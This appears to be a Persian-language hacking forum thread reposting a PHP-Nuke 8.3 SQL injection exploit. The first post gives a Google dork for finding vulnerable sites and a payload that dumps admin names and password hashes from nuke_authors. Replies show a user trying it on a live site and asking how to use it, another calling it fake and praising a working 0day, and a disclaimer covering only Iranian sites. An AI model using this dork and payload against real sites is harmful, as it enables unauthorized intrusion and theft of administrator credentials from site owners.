SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

phpnuke 8.3 Sql Injection Vulnerability

بستن
X
بستن
 
  • صفحه از 1
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید
قبلی template بعدی
  • #1

    phpnuke 8.3 Sql Injection Vulnerability

    کد:
    + author : ali ahmady -- Iranian security researcher
+ email : snip3r_ir[at]hotmail.com
+ greets : b0x , Phantom_X , VIRkid , MOH@MMAD , zeus REKCAH , milad22
+ google dork : inurl: modules.php?name=Submit_News
+ at post review level you can inject topic parameter.
+ exploit code : subject=whatever&topics%5B%5D=-1' UNION SELECT 1,group_concat(aid,0x3a,pwd) from nuke_authors--+&alanguage=english&story=whatever
+ tool : live http header

# 57A1DBDD0FAB7140 1337day.com [2014-05-27] 225618FA01918EEB #

    http://1337day.com/exploit/22277
    [align=CENTER]:135:بازی دست ما افتاد:135:

    [/align]
    برچسب ها: هیچ یک
  • #2
    RE: phpnuke 8.3 Sql Injection Vulnerability

    سلام دوست عزیز
    ممنون بابت آسیب پذیری که قرار دادید.
    فقط یک سوال:
    من وقتی از دورکی که داده شده در گوگل استفاده کردم وارد یکی از لینک ها شدم و در قسمت Subject کد زیر رو قرار دادم. وقتی که روی دکمه ی ارسال کلیک کردم هیچ اتفاق خاصی نیفتاد. البته اشکال از من هست چون نحوه ی کار کردن با این آسیپ پذیری رو بلد نیستم. به همین خاطر از شما می خوام اگه ممکنه درباره ی نحوه ی استفاده از این آسیپ پذیری به زبان ساده یک سری توضیحاتی بدید.
    با تقدیم احترام
    صداقت
    کد:
    whatever&topics%5B%5D=-1' UNION SELECT 1,group_concat(aid,0x3a,pwd) from nuke_authors--+&alanguage=english&story=whatever

    نظر

    • #3
      RE: phpnuke 8.3 Sql Injection Vulnerability

      آسیب پذیری جعلی است ، تست کردم نتیجه نداد .

      یاده pentester.ir بخیر یه 0day از این نیوک داد که هنوزم جواب میده .

      زمان نزارین روی این اکسپلویتها خودتون دیباگ کنبن خبلی بهتره باور کنید .
      [align=center]زشیر شتر خوردن و سوسمار            عرب را به جایی رسیده ست کار

      که تاج کیانی کند آرزو                     تفو بر تو ای چرخ گردون تفو      [/align]

      نظر

      • #4
        RE: phpnuke 8.3 Sql Injection Vulnerability

        شماهم اگر بلد نیستی جای خاطره تعریف کردن سوال کن

        صداقت : لینک آموزش







        تذکر: مسئولیت هک سایتهای ایرانی بعهده فرد خاطی ( هک کننده ) هست

        نظر

        • #5
          RE: phpnuke 8.3 Sql Injection Vulnerability

          آموزش کامل میزارین
          tanksssssssssssss
          [hr]
          واضح آموزش میدین

          نظر

          قبلی template بعدی
          صبر کنید ..
          X